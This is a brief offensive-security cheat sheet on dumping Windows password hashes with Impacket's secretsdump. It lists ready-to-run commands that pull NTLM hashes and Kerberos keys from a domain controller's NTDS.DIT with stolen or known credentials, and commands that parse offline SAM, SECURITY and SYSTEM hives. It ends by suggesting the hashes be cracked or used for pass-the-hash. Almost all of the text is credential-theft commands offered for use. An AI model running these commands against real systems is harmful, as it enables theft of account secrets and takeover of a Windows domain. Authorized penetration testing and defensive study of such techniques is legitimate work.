Dumping Windows Password Hashes
Using Impacket's SecretsDump, we can dump the Windows password hashes.
- [Impacket-SecretsDump](https://wadcoms.github.io/wadcoms/Impacket-SecretsDump/)
Commands
Using Credentials
impacket-secretsdump example.local/username:password@<target-ip>
# -just-dc: Extract only NTDS.DIT (NTLM hashes and kerberos keys).
impacket-secretsdump -just-dc example.local/username:password@<target-ip>
# -just-dc-ntlm: Extract only NTDS.DIT data (NTLM hashes only).
impacket-secretsdump -just-dc-ntlm example.local/username:password@<target-ip>
Using NTDS file or Hives
# -ntds: NTDS.DIT file to parse
# -system: SYSTEM hive to parse
impacket-secretsdump -ntds ntds.dit -system system LOCAL
# -sam: SAM hive to parse
# -security: SECURITY hive to parse
# -system: SYSTEM hive to parse
impacket-secretsdump -sam sam.bak -security security.bak -system system.bak LOCAL
After dumping, we can crack them to reveal passwords or use them with Pass-The-Hash.